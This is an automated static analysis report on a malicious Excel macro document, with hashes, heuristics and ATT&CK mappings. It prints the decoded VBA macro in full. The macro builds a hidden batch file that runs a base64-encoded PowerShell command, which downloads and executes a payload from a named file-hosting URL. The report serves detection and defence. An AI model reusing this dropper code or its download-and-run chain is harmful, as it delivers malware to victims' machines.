Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 fce9a08d6ab78a6c…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 463.8 KB
Created: 2020-01-28 19:47:00 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-10-23

MD5: a588b0551075fdbf8317636bda34ca18
SHA-1: 7928fae7258f1cdbda8d90b555ccb2738a8a08a4
SHA-256: fce9a08d6ab78a6c45c88a39bb897c10cabb917aafacdef66994d93c0ea3f1e0

Risk Score: 172

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The VBA macro contains obfuscated code that, when decoded, reveals a PowerShell command. This command is designed to download a second-stage payload from the URL 'https://www.4sync.com/web/directDownload/8jRtVQkU/L7ozfgqr.d9af2cbeecb8ad2c3e3cce893c'. The document body itself contains a lure, instructing the user to 'Enable Content' to view the spreadsheet, which is a common tactic for macro-based malware. The use of Shell() and the reassembled PowerShell command indicate a clear intent to execute arbitrary code.

Heuristics (7)

  • VBA project inside OOXML [medium] (2 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • External hyperlinks (2) [low] OOXML_EXTERNAL_HYPERLINKS
    Document contains 2 external hyperlinks — clickable URLs are stored as external relationships. First target: https://go.microsoft.com/fwlink/?linkid=844749
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 5640 bytes
SHA-256: 6e885834326b5bf83824a4b329af0c65505d3f274af0076613a2bf3059e2e6ce
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 1 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
Dim i As Double
Dim batch As String
Dim call1 As String
Dim enc As String
enc = "JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBKAHQAYwByAGkAegBsAHIAYQBpAG8AYgB1AG8AcAByAC4AZQB4AGUAIgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADQAcwB5AG4AYwAuAGMAbwBtAC8AdwBlAGIALwBkAGkAcgBlAGMAdABEAG8AdwBuAGwAbwBhAGQALwA4AGoAUgB0AFYAUQBLAFUALwBMADcAbwBaAHoAZgBxAHIALgBkADkAYQBmADIAYwBiAGUAZQBiAGMAZAA1AGMAOABhADgAYQBkAGQAYwAyADMAZQAzAGMAYwBlADgAOQAzADMAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA=="
call1 = "WindowsPo" + "werShell\v1.0\pow" + "ershell.exe"
ActiveWorkbook.Save
batch = "Vylxjnypxajbroztle.bat"
Open batch For Output As #1
Print #1, "start /MIN C:\Windo" + "ws\SysWOW64\" + call1 + " -win 1 -enc " + enc
Close #1
i = Shell(batch, 0)
End Sub

Private Sub Workbook_SheetBeforeRightClick(ByVal Sh As Object, ByVal Target As Range, Cancel As Boolean)

End Sub

Private Sub Workbook_SheetCalculate(ByVal Sh As Object)

End Sub


Private Sub Cellss()

End Sub

Private Sub Workbook_SheetSelectionChange(ByVal Sh As Object, ByVal Target As Range)

End Sub

Attribute VB_Name = "Start"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attr
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 37888 bytes
SHA-256: 6182bca45261b723083383b04548a39ef81d767063e49c5a132a15a231e8ae9b
Detection:
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 1 long base64-like blob(s).